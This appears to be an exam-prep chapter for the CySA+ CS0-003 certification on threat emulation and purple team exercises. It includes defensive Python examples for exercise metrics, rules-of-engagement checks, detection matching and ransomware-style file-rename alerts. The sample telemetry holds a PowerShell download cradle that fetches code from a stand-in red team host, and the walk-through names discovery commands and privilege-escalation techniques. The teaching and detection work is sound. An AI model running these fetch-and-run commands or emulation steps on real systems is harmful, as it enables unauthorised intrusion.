CS0-003 | Chapter 92 of 100 | Objective 1.1

Threat Emulation and Purple Team Exercises

This chapter covers threat emulation and purple team exercises, two advanced security operations practices that go beyond traditional penetration testing. For the CS0-003 exam, these topics appear in approximately 10-15% of Security Operations questions, particularly those focusing on proactive defense and continuous improvement. Understanding the difference between red, blue, and purple teams, as well as the structured process of threat emulation, is essential for the CySA+ role. You will learn the specific methodologies, tools, and outputs that define these exercises and how they integrate with broader security operations.

25 min read | Intermediate | Updated May 31, 2026

Full-Scale Combat Simulation for Cyber Teams

Threat emulation and purple team exercises are like a military force conducting a full-scale combat simulation (a 'force-on-force' exercise) where two teams engage in realistic battle scenarios. The red team acts as the enemy force, using actual enemy tactics, techniques, and procedures (TTPs) to attack. The blue team defends using standard operating procedures. Unlike traditional penetration testing (which is like a single sniper taking potshots at a fortified position), threat emulation is a coordinated, multi-vector assault that mirrors real adversaries. The purple team is like the exercise control group that observes both sides, adjusts the scenario in real time, and ensures that lessons are learned and incorporated into updated defensive plans. The exercise is not about 'winning' but about identifying gaps, testing response procedures, and improving overall readiness. Just as a military after-action review (AAR) examines every decision, a purple team exercise produces detailed findings that directly improve security controls, detection rules, and incident response playbooks.

How It Actually Works

What is Threat Emulation?

Threat emulation is a structured, goal-oriented security assessment that simulates the tactics, techniques, and procedures (TTPs) of specific threat actors. Unlike vulnerability scanning (which identifies weaknesses) or penetration testing (which exploits vulnerabilities to demonstrate impact), threat emulation focuses on mimicking an adversary's behavior across the entire attack lifecycle, from initial access to exfiltration. The objective is to test detection and response capabilities, not just to find vulnerabilities. Threat emulation is typically performed by a red team, which operates with a specific threat profile (e.g., APT29, FIN7, or a ransomware group) and follows a detailed engagement plan.

Purple Team Exercises

A purple team exercise is a collaborative activity where the red team (offensive) and blue team (defensive) work together, often with a facilitator (the purple team), to improve detection and response capabilities. The purple team acts as a bridge, ensuring that red team activities are visible to the blue team in real time, and that blue team feedback is incorporated into the red team's approach. The goal is not to 'win' but to identify gaps in detection coverage, refine incident response procedures, and validate security controls. Purple team exercises can be conducted as part of a continuous improvement cycle or as a one-time engagement.

Key Components of Threat Emulation

Threat Profile: A detailed description of the adversary being emulated, including their TTPs, target industries, tools, and motivations. Sources include MITRE ATT&CK, threat intelligence feeds, and incident reports.

Engagement Plan: A document outlining the scope, rules of engagement, objectives, and timeline. It specifies what systems can be targeted, what techniques are allowed, and how to handle critical systems.

Emulation Plan: A step-by-step sequence of actions that mimic the adversary's attack chain. Each step maps to a MITRE ATT&CK technique (e.g., T1566 Phishing, T1059 Command and Scripting Interpreter).

Detection and Response Validation: The blue team's ability to detect and respond to each step is measured. Gaps are recorded and prioritized for remediation.

The Threat Emulation Process

1. Planning and Intelligence Gathering: The red team researches the target environment and selects a threat profile based on the organization's risk profile. They gather open-source intelligence (OSINT) and any authorized internal data.

2. Emulation Plan Development: The red team creates a detailed emulation plan mapping each action to MITRE ATT&CK techniques. They develop or customize tools to mimic the adversary's capabilities, including the adversary's known tooling artifacts where intelligence describes them.

3. Execution: The red team executes the plan, starting with initial access (e.g., a phishing email carrying a document with a malicious macro) and progressing through execution, persistence, privilege escalation, defense evasion, credential access, discovery, lateral movement, collection, command and control, exfiltration and, where the threat profile calls for it, impact (the ATT&CK Enterprise tactic order).

4. Purple Team Integration: During execution, the purple team ensures that the blue team is aware of the exercise and can observe red team actions. The blue team records each detection and response with a timestamp so that it can later be matched to the red team's action log.

5. Analysis and Reporting: After the exercise, the purple team leads a debrief. The red team provides a technical report of their actions, and the blue team provides a detection and response report. Gaps are identified and prioritized.

6. Remediation and Re-testing: The organization implements fixes (e.g., new detection rules, improved segmentation, updated playbooks). A re-test of the same plan steps validates that the gaps are closed rather than merely documented.

Tools and Technologies

Cobalt Strike: Commercial adversary simulation tool that provides a post-exploitation agent (Beacon) and supports extensive customization for emulating specific TTPs.

Metasploit: Open-source exploitation framework often used for initial access and post-exploitation.

Atomic Red Team: Open-source library of tests mapped to MITRE ATT&CK that can be used for quick validation of detection capabilities.

Caldera: Open-source automated adversary emulation platform developed by MITRE. It uses plugins to execute ATT&CK techniques.

Sysmon and Windows Event Logging: Essential for blue team detection; red team actions generate specific event IDs (e.g., Sysmon Event ID 1 and Security Event ID 4688 for process creation, PowerShell Operational Event ID 4104 for script block logging). Note that 4688 only carries the command line when process command-line auditing is enabled, and 4104 only exists when script block logging is turned on; an exercise frequently reveals hosts where neither is configured.

SIEM and EDR: Blue team uses tools like Splunk, Elastic, CrowdStrike, or SentinelOne to detect and alert on red team activities.

Metrics and Success Criteria

Detection Rate: Percentage of red team actions detected by the blue team during the exercise.

Time to Detect (TTD): Average time from action start to detection.

Time to Respond (TTR): Average time from detection to containment or response.

Coverage Gap: Number of ATT&CK techniques that were not detected or for which no alert fired.

False Positive Rate: Share of alerts fired during the exercise that did not correspond to any red team action (a high rate points to noisy detection rules and helps explain slow triage of the real alerts).
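The metrics above are easy to define and easy to compute inconsistently. The following Python script is an added example, not code from the original page: it computes detection rate, mean time to detect, mean time to respond, coverage gap and false positive rate from a red team action log and a blue team alert log. Both logs, the timestamps and the technique IDs are constructed for illustration; the `action_id` link on each alert stands for the deconfliction step in which the purple team ties an alert back to the red team action that caused it.

```python
"""Purple team exercise metrics computed from a constructed action/alert log.

Added example (not code from the original page). The red team action log and
blue team alert log below are constructed for illustration; in a real exercise
they come from the red team's timestamped operator log and an export of
SIEM/EDR alerts, with each alert tied to a red team action during deconfliction
(the action_id field here is that deconfliction link).
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class RedAction:
    action_id: str
    technique: str       # ATT&CK technique ID from the emulation plan
    started: datetime    # when the red team ran the step (from the operator log)


@dataclass
class BlueAlert:
    alert_id: str
    fired: datetime
    action_id: Optional[str]              # None = not tied to any red action
    contained: Optional[datetime] = None  # when the blue team contained it, if ever


def exercise_metrics(actions, alerts):
    """Return detection rate, mean TTD/TTR, coverage gap and false positive rate."""
    first_alert = {}  # action_id -> earliest alert for that action
    for al in alerts:
        if al.action_id is None:
            continue
        if al.action_id not in first_alert or al.fired < first_alert[al.action_id].fired:
            first_alert[al.action_id] = al

    detected = [a for a in actions if a.action_id in first_alert]
    # TTD: from the red team's action start to the first alert on that action
    ttd = [(first_alert[a.action_id].fired - a.started).total_seconds() for a in detected]
    # TTR: from that first alert to containment; actions never contained are excluded
    responded = [first_alert[a.action_id] for a in detected if first_alert[a.action_id].contained]
    ttr = [(al.contained - al.fired).total_seconds() for al in responded]

    planned = {a.technique for a in actions}
    seen = {a.technique for a in detected}
    false_positives = [al for al in alerts if al.action_id is None]

    return {
        "detection_rate": len(detected) / len(actions) if actions else 0.0,
        "mean_ttd_seconds": sum(ttd) / len(ttd) if ttd else None,
        "mean_ttr_seconds": sum(ttr) / len(ttr) if ttr else None,
        "coverage_gap": sorted(planned - seen),   # techniques with no alert at all
        "uncontained": sorted(a.action_id for a in detected
                              if not first_alert[a.action_id].contained),
        "false_positive_rate": len(false_positives) / len(alerts) if alerts else 0.0,
    }


T0 = datetime(2026, 5, 1, 9, 0)  # constructed exercise start time

SAMPLE_ACTIONS = [  # constructed red team operator log
    RedAction("A1", "T1566.001", T0),                          # spearphishing attachment
    RedAction("A2", "T1059.001", T0 + timedelta(minutes=5)),   # PowerShell stager
    RedAction("A3", "T1547.001", T0 + timedelta(minutes=10)),  # Run key persistence
    RedAction("A4", "T1069.002", T0 + timedelta(minutes=20)),  # domain group discovery
    RedAction("A5", "T1021.002", T0 + timedelta(minutes=40)),  # SMB lateral movement
]

SAMPLE_ALERTS = [  # constructed SIEM/EDR alert export after deconfliction
    BlueAlert("AL1", T0 + timedelta(minutes=2), "A1", contained=T0 + timedelta(minutes=30)),
    BlueAlert("AL2", T0 + timedelta(minutes=6), "A2"),    # detected, never contained
    BlueAlert("AL3", T0 + timedelta(minutes=8), "A2"),    # later duplicate, ignored for TTD
    BlueAlert("AL4", T0 + timedelta(minutes=15), None),   # not a red team action: false positive
    BlueAlert("AL5", T0 + timedelta(minutes=21), "A4", contained=T0 + timedelta(minutes=51)),
]

if __name__ == "__main__":
    for key, value in exercise_metrics(SAMPLE_ACTIONS, SAMPLE_ALERTS).items():
        print(f"{key}: {value}")
```

On the constructed data this reports a 60% detection rate, a mean TTD of 80 seconds, a mean TTR of 29 minutes, a coverage gap of T1021.002 and T1547.001, and one false positive in five alerts. Two design choices matter in practice: TTD is measured from the first alert, not the loudest one, so duplicate alerts do not flatter the number; and actions that were detected but never contained are reported separately rather than silently dropped from TTR.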

Integration with Security Operations

Threat emulation and purple team exercises are part of a continuous improvement cycle. They feed into:

Detection Engineering: Creating or tuning detection rules (e.g., Sigma rules, YARA rules).

Incident Response Playbooks: Updating response procedures based on observed gaps.

Security Control Tuning: Adjusting firewall rules, IPS signatures, and email security filters.

Training and Awareness: Improving analyst skills through realistic scenarios.

Common Pitfalls

Lack of Scope Clarity: Unclear rules of engagement can lead to unintended service disruption.

Over-reliance on Automated Tools: Atomic tests and automated Caldera operations give breadth and repeatability, but the adversary being emulated adapts to what it finds; part of the exercise must be run by hand so that the tooling, timing, and tradecraft resemble the real actor and not just its technique IDs.

Ignoring Purple Team Integration: Without collaboration, exercises become 'red vs. blue' contests that don't improve defenses.

Insufficient Threat Intelligence: Using generic TTPs instead of specific adversary profiles reduces relevance.

CS0-003 Exam Relevance

The exam tests your understanding of:

The difference between red, blue, and purple teams.

The purpose and process of threat emulation (not just pen testing).

How purple team exercises improve detection and response.

Key metrics like detection rate and time to detect.

The role of MITRE ATT&CK in structuring emulation plans.

Common tools (Cobalt Strike, Atomic Red Team, Caldera).

The importance of after-action reviews and continuous improvement.

Walk-Through

1. Define Threat Profile and Scope

The red team collaborates with stakeholders to select a specific threat actor to emulate, based on the organization's threat landscape. They gather intelligence from sources like MITRE ATT&CK, threat reports, and internal risk assessments. The scope is defined: which systems, networks, and applications are in-scope, and what techniques are allowed (e.g., social engineering, physical access). Rules of engagement are established, including emergency stop procedures and communication channels. This step ensures the exercise is realistic but safe.

2. Develop Emulation Plan

The red team creates a detailed plan mapping each action to a MITRE ATT&CK technique. For example, initial access might use T1566.001 (Spearphishing Attachment), execution via T1059.001 (PowerShell), and persistence via T1547.001 (Registry Run Keys). The plan includes specific commands, tools, and expected outputs. It also defines success criteria for each step (e.g., 'successful execution of payload on target'). The plan is reviewed by the purple team to ensure it aligns with objectives and stays within the rules of engagement.

3. Prepare the Blue Team

The purple team briefs the blue team on the exercise, either with full knowledge (white box) or limited knowledge (gray box). The blue team ensures that detection tools are logging appropriately and that incident response procedures are ready. They may also tune detection rules to reduce noise. The purple team establishes a communication channel for real-time feedback. The blue team is instructed to treat red team actions as real incidents unless told otherwise.

4. Execute Red Team Actions

The red team executes the emulation plan step by step. For example, they send a phishing email carrying a document with a malicious macro. When the macro runs, it downloads a Cobalt Strike Beacon. The red team then runs discovery commands (e.g., `net group "Domain Admins" /domain`, ATT&CK T1069.002), escalates privileges with a known local technique (e.g., JuicyPotato, which abuses SeImpersonatePrivilege held by a service account), and moves laterally to a file server. Each action is logged and timestamped by the red team so that alerts can later be matched to it. The purple team monitors the blue team's detection and response in real time.

5. Conduct After-Action Review

After the exercise, the purple team facilitates a debrief with both red and blue teams. The red team presents their actions and what was detected. The blue team presents their alerts, investigations, and responses. Gaps are identified: techniques that were not detected, alerts that were missed, or responses that were slow. Each gap is assigned a priority and a remediation action. The report includes metrics like detection rate and time to detect. The organization implements fixes and schedules a re-test.
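The walk-through above has two checks that are worth automating: the rules-of-engagement review of the plan in step 2, and matching the telemetry from step 4 back to each plan step so the review in step 5 can say which steps were detected, which were missed, and which had no detection at all. The Python below is an added example, not code from the original page or from any of the tools it names. The plan, the rules of engagement, the three detection rules, the hostnames (WKS-FIN-07, FS-01, DC-01), the staging URL and the Windows event records are all constructed assumptions. Event IDs follow the page: Security 4688 (process creation) and PowerShell Operational 4104 (script block logging).

```python
"""Emulation plan checked against the rules of engagement, then matched to telemetry.

Added example (not from the original page). Plan, ROE, detection rules, hostnames,
the staging URL and the event records are constructed for illustration.
"""
import re
from dataclasses import dataclass, field

TECHNIQUE_ID = re.compile(r"^T\d{4}(\.\d{3})?$")  # ATT&CK technique / sub-technique ID shape


@dataclass
class PlanStep:
    step: int
    technique: str   # ATT&CK technique ID
    target: str      # hostname the step touches
    command: str     # what the operator will run (drives the expected telemetry)
    success: str     # success criterion for the step


@dataclass
class RulesOfEngagement:
    in_scope_hosts: set
    allowed_techniques: set                               # technique or parent IDs approved by stakeholders
    prohibited_hosts: set = field(default_factory=set)    # never touched, even if inside the scope


def validate_plan(plan, roe):
    """Return human-readable problems; an empty list means the plan may execute."""
    problems = []
    for s in plan:
        if not TECHNIQUE_ID.match(s.technique):
            problems.append(f"step {s.step}: malformed technique ID {s.technique!r}")
        elif s.technique not in roe.allowed_techniques and s.technique.split(".")[0] not in roe.allowed_techniques:
            problems.append(f"step {s.step}: {s.technique} not in the ROE allowed list")
        if s.target in roe.prohibited_hosts:
            problems.append(f"step {s.step}: {s.target} is a prohibited host")
        elif s.target not in roe.in_scope_hosts:
            problems.append(f"step {s.step}: {s.target} is out of scope")
        if not s.success.strip():
            problems.append(f"step {s.step}: no success criterion")
    return problems


# Detection rules the blue team expects to fire, one per technique in the plan (constructed).
def _powershell_download_cradle(ev):
    return ev["EventID"] == 4104 and re.search(
        r"downloadstring|invoke-webrequest|\biex\b", ev.get("ScriptBlockText", ""), re.I) is not None

def _run_key_persistence(ev):
    return (ev["EventID"] == 4688 and ev.get("NewProcessName", "").lower().endswith("\\reg.exe")
            and "\\currentversion\\run" in ev.get("CommandLine", "").lower())

def _domain_group_discovery(ev):
    return (ev["EventID"] == 4688
            and ev.get("NewProcessName", "").lower().endswith(("\\net.exe", "\\net1.exe"))
            and re.search(r'group\s+"domain admins"\s+/domain', ev.get("CommandLine", ""), re.I) is not None)

RULES = {"T1059.001": _powershell_download_cradle,
         "T1547.001": _run_key_persistence,
         "T1069.002": _domain_group_discovery}


def detection_results(plan, events):
    """Per step: 'detected', 'missed' (a rule exists but did not fire) or 'no-rule' (coverage gap)."""
    out = {}
    for s in plan:
        rule = RULES.get(s.technique)
        if rule is None:
            out[s.step] = "no-rule"
            continue
        hits = [ev for ev in events if ev["Computer"] == s.target and rule(ev)]
        out[s.step] = "detected" if hits else "missed"
    return out


SAMPLE_ROE = RulesOfEngagement(
    in_scope_hosts={"WKS-FIN-07", "FS-01", "DC-01"},
    allowed_techniques={"T1566", "T1059.001", "T1547.001", "T1069", "T1021.002"},
    prohibited_hosts={"DC-01"},  # inside the network scope, but never to be touched
)

SAMPLE_PLAN = [
    PlanStep(1, "T1059.001", "WKS-FIN-07", "powershell -nop -w hidden -c IEX(...)", "Beacon checks in"),
    PlanStep(2, "T1547.001", "WKS-FIN-07", "reg add HKCU\\...\\CurrentVersion\\Run /v Updater", "Run key present"),
    PlanStep(3, "T1069.002", "WKS-FIN-07", 'net group "Domain Admins" /domain', "Members listed"),
    PlanStep(4, "T1021.002", "FS-01", "SMB admin share access from WKS-FIN-07", "Share listing from FS-01"),
]

# Constructed telemetry. Step 2's 4688 has an empty CommandLine: the host did not have
# process command-line auditing enabled, so the Run key rule cannot see the path.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WKS-FIN-07",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://stage.redteam.example/s')"},
    {"EventID": 4688, "Computer": "WKS-FIN-07", "NewProcessName": "C:\\Windows\\System32\\reg.exe", "CommandLine": ""},
    {"EventID": 4688, "Computer": "WKS-FIN-07", "NewProcessName": "C:\\Windows\\System32\\net.exe",
     "CommandLine": 'net  group "Domain Admins" /domain'},
]

if __name__ == "__main__":
    problems = validate_plan(SAMPLE_PLAN, SAMPLE_ROE)
    print("ROE problems:", problems or "none")
    if not problems:
        print("detection:", detection_results(SAMPLE_PLAN, SAMPLE_EVENTS))
    # a step against the prohibited domain controller is refused before anything executes
    print(validate_plan([PlanStep(5, "T1003.006", "DC-01", "DCSync", "hashes")], SAMPLE_ROE))
```

The three outcomes map directly onto after-action findings: step 2 is "missed" because the rule exists but the host logged 4688 without a command line (a logging-configuration fix, not a new rule), step 4 is "no-rule" (a detection coverage gap to hand to detection engineering), and the DCSync step against DC-01 never reaches execution because the ROE check rejects it.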

What This Looks Like on the Job

Scenario 1: Financial Institution Emulating FIN7 A large bank wants to test its defenses against FIN7, a financially motivated threat group known for targeting point-of-sale (POS) systems and using spear-phishing with malicious LNK files. The red team develops an emulation plan using Cobalt Strike and creates a phishing campaign targeting the bank's finance department. They use a malicious Excel add-in (XLL) to gain initial access, then use PowerShell to perform discovery and lateral movement to POS servers. The blue team, using an EDR solution, detects the initial phishing but misses the lateral movement due to a gap in network segmentation monitoring. The purple team identifies that the blue team's SIEM lacked a correlation rule for unusual SMB connections from workstations to POS subnets. The remediation involves adding a detection rule and tightening firewall rules. The exercise also reveals that incident response playbooks did not cover POS compromise, leading to a new playbook.

Scenario 2: Healthcare Provider Emulating Ryuk Ransomware A hospital system wants to validate its ransomware defenses by emulating Ryuk, which typically followed a TrickBot infection (TrickBot providing the initial foothold) before ransomware deployment. The red team uses a combination of phishing with TrickBot-like payloads and then simulates Ryuk encryption using a custom script that encrypts test files on file shares. The blue team, using a combination of Sysmon logging and a SIEM, detects the initial TrickBot-like infection via a known IOC but fails to detect the ransomware deployment because the encryption script was not flagged by the EDR's behavior monitoring. The purple team finds that the EDR's ransomware behavior model was not tuned for the specific encryption patterns used. The remediation includes updating the EDR policy and adding a SIEM rule that alerts on mass file extension changes. The hospital also improves backup verification procedures.

Scenario 3: Technology Company Emulating APT29 A cloud-based SaaS company wants to test its detection of APT29 (Cozy Bear), a nation-state actor known for targeting cloud environments. The red team uses valid credentials obtained via password spraying (simulated) to access Office 365, then performs mailbox enumeration and data exfiltration via Outlook Web Access. The blue team, using Microsoft Defender for Office 365 and Cloud App Security, detects the password spraying but does not correlate it with the subsequent mailbox access because the IP addresses used by the red team were not flagged as anomalous. The purple team identifies that the blue team's UEBA rules were not configured to detect access from unusual geographic locations. The remediation includes enabling location-based anomaly detection and creating a playbook for credential-based attacks. The exercise also highlights the need for faster response to password spraying alerts.
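Scenario 2 ends with a SIEM rule that "alerts on mass file extension changes". The Python below is an added example of that rule, not code from the original page or from any SIEM product: it groups file-creation records by host and new extension and raises one alert when a threshold number of distinct files gain the same extension inside a sliding time window. The records mimic Sysmon Event ID 11 (FileCreate) fields; the hostnames, file names, the 20-file threshold and the 60-second window are constructed assumptions to be tuned per environment.

```python
"""Mass file extension change detector (the SIEM rule scenario 2 adds after the Ryuk emulation).

Added example, not from the original page. Records mimic Sysmon Event ID 11 (FileCreate):
Computer, UtcTime, TargetFilename. Hostnames, file names, threshold and window are constructed.
"""
import os
from collections import defaultdict, deque
from datetime import datetime, timedelta


def mass_extension_change_alerts(events, threshold=20, window=timedelta(seconds=60)):
    """Alert once per (host, extension) when >= threshold distinct files gain the same
    extension inside a sliding time window. Returns a list of alert dicts."""
    by_key = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        ext = os.path.splitext(ev["TargetFilename"])[1].lower()
        if ext:  # files with no extension are not evidence of an extension change
            by_key[(ev["Computer"], ext)].append(ev)

    alerts = []
    for (host, ext), evs in by_key.items():
        recent = deque()  # events for this host/extension inside the current window
        for ev in evs:
            recent.append(ev)
            while ev["UtcTime"] - recent[0]["UtcTime"] > window:
                recent.popleft()
            distinct = {e["TargetFilename"] for e in recent}
            if len(distinct) >= threshold:
                alerts.append({"host": host, "extension": ext, "files": len(distinct),
                               "window_start": recent[0]["UtcTime"],
                               "sample": recent[0]["TargetFilename"]})
                break  # one alert per host/extension burst is enough for the SOC queue
    return alerts


def _file_burst(host, count, spacing, ext, start):
    """Constructed events: `count` files on `host`, created `spacing` apart, all ending in `ext`."""
    return [{"Computer": host, "UtcTime": start + i * spacing,
             "TargetFilename": f"\\\\{host}\\share\\report_{i:03d}.docx{ext}"}
            for i in range(count)]


T0 = datetime(2026, 5, 1, 3, 12)  # constructed: an early-morning encryption run
SAMPLE_EVENTS = (
    _file_burst("FS-01", 25, timedelta(seconds=1), ".locked", T0)     # the encryption script
    + _file_burst("WKS-02", 5, timedelta(seconds=1), ".tmp", T0)      # normal application noise
    + _file_burst("FS-02", 25, timedelta(seconds=15), ".bak", T0)     # slow backup job: spread out
)

if __name__ == "__main__":
    for alert in mass_extension_change_alerts(SAMPLE_EVENTS):
        print(alert)
```

On the constructed data only FS-01 alerts: the 25 `.locked` files land within 25 seconds, while the backup job on FS-02 writes the same number of files but never more than five inside any 60-second window. Shrinking the window to 10 seconds makes even the FS-01 burst fall under the threshold, which is the tuning trade-off the purple team has to settle with the SOC. One caveat on the telemetry: Sysmon's FileCreate event covers new files, not in-place renames, so an encryptor that renames files without creating new ones needs object-access auditing (Security 4663) or the EDR's own file telemetry as the input instead.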

How CS0-003 Actually Tests This

CS0-003 Exam Focus on Threat Emulation and Purple Team Exercises

The exam tests your understanding of the purpose and process of these exercises, not just definitions. Key objective codes: 1.1 (Explain the importance of system and network architecture concepts in security operations) and 1.2 (Given a scenario, analyze indicators of potentially malicious activity).

Common wrong answers include confusing threat emulation with penetration testing (pen testing focuses on vulnerability exploitation, not TTP emulation), thinking the purple team is a separate, permanent team (it is a collaborative exercise, not a standing role), and believing the goal is to 'catch' the red team (the goal is to improve detection and response).

Specific details to know: detection rate and time to detect are the common metrics, and a purple team exercise can be white box (the blue team knows the scenario) or gray box (limited knowledge).

The exam likes edge cases. What happens if a red team action causes a real outage? The emergency stop in the rules of engagement is invoked immediately and the incident is handled as real. When should you NOT use threat emulation? When the organization lacks basic security controls; establish vulnerability management and baseline logging first, since an emulation against an environment with no detection capability produces nothing but a list of undetected techniques.

Terms that appear verbatim: 'rules of engagement', 'after-action review', 'MITRE ATT&CK mapping', 'detection coverage gap'. To eliminate wrong answers, focus on the underlying mechanism: threat emulation is about behavioral simulation, not just finding vulnerabilities. If a question asks about improving detection, think purple team and threat emulation. If it asks about finding vulnerabilities, think penetration testing.

Key Takeaways

Threat emulation simulates specific adversary TTPs, not just vulnerabilities.

Purple team exercises are collaborative, not adversarial, and focus on improving detection and response.

The after-action review is essential for documenting gaps and assigning remediation.

Common metrics: detection rate, time to detect, time to respond, coverage gap.

Tools: Cobalt Strike, Caldera, Atomic Red Team, Metasploit.

MITRE ATT&CK is used to map emulation plan steps to known adversary techniques.

Rules of engagement must be defined to avoid unintended damage.

Purple team exercises can be white box (full knowledge) or gray box (limited knowledge).

Threat emulation should be part of a continuous improvement cycle, not a one-time event.

Easy to Mix Up

These come up on the exam all the time. Here's how to tell them apart.

Red Team Exercise

Red team operates independently, often without blue team knowledge (black box).

Goal is to test overall security posture, including detection and response, but without real-time collaboration.

Success is measured by whether the red team achieves its objectives (e.g., exfiltration).

Findings are shared after the exercise in a report.

Can be adversarial and may cause friction between teams.

Purple Team Exercise

Red and blue teams collaborate in real time, with a facilitator (purple team).

Goal is to improve detection and response capabilities through continuous feedback.

Success is measured by detection rate, time to detect, and coverage gaps.

Findings are discussed during the exercise and in an after-action review.

Promotes cooperation and shared learning.

Watch Out for These

Mistake

Threat emulation is the same as penetration testing.

Correct

Penetration testing focuses on exploiting vulnerabilities to demonstrate impact, while threat emulation simulates a specific adversary's TTPs across the entire attack lifecycle to test detection and response. Pen testing is vulnerability-centric; threat emulation is behavior-centric.

Mistake

The purple team is a permanent team of security professionals.

Correct

Purple team is a collaborative exercise or methodology, not a permanent team. It involves red and blue teams working together, often facilitated by a purple team lead. The goal is to improve defenses, not to maintain a separate team.

Mistake

The goal of a purple team exercise is for the blue team to catch the red team.

Correct

The goal is to identify gaps in detection and response, not to 'win'. Both teams work together to improve security. Success is measured by metrics like detection rate and time to detect, not by whether the red team was caught.

Mistake

Threat emulation requires expensive commercial tools like Cobalt Strike.

Correct

While Cobalt Strike is common, open-source tools like Caldera, Atomic Red Team, and Metasploit can be used effectively. The key is the emulation plan and methodology, not the tool.

Mistake

After-action reviews are optional in purple team exercises.

Correct

The after-action review is critical. It is where findings are documented, gaps are prioritized, and remediation actions are assigned. Without it, the exercise provides no lasting improvement.


Frequently Asked Questions

What is the difference between a red team exercise and a purple team exercise?

A red team exercise is an adversarial simulation where the red team attacks the blue team without the blue team's knowledge, testing overall security. A purple team exercise is a collaborative activity where red and blue teams work together, often with a facilitator, to improve detection and response. The purple team ensures real-time feedback and focuses on learning, not winning.

What metrics are used to measure the success of a purple team exercise?

Key metrics include detection rate (percentage of red team actions detected), time to detect (average time from action to detection), time to respond (average time from detection to response), and coverage gap (number of ATT&CK techniques not detected). These metrics help quantify improvements over time.

What tools are commonly used for threat emulation?

Common tools include Cobalt Strike (commercial adversary simulation), Caldera (open-source automated emulation by MITRE), Atomic Red Team (open-source test library), and Metasploit (exploitation framework). The choice depends on budget and specific adversary being emulated.

How does threat emulation differ from vulnerability scanning?

Vulnerability scanning identifies weaknesses (e.g., missing patches, misconfigurations) by probing systems against a signature database, without exploiting them. Threat emulation simulates a specific adversary's behavior, including exploitation and post-exploitation activity, to test detection and response. Scanning is non-exploitative and inventory-oriented; emulation is interactive and behavioral.

What is the role of MITRE ATT&CK in threat emulation?

MITRE ATT&CK provides a framework of adversary TTPs. In threat emulation, the red team maps each action to a specific technique (e.g., T1566 Phishing, T1059.001 PowerShell) to ensure the simulation is structured and measurable. It also helps the blue team identify which techniques they can detect, and which planned techniques have no detection rule at all.

Can a purple team exercise be conducted without a dedicated purple team?

Yes. A purple team exercise can be facilitated by an experienced security professional who acts as the purple team lead. The key is to have a structured process for real-time collaboration and after-action review, not necessarily a permanent team.

What should be included in the rules of engagement for a threat emulation exercise?

Rules of engagement should specify in-scope systems and networks, allowed techniques (e.g., social engineering, physical access), prohibited actions (e.g., causing denial of service), emergency stop procedures, communication channels, and data handling requirements. They must be approved by stakeholders.
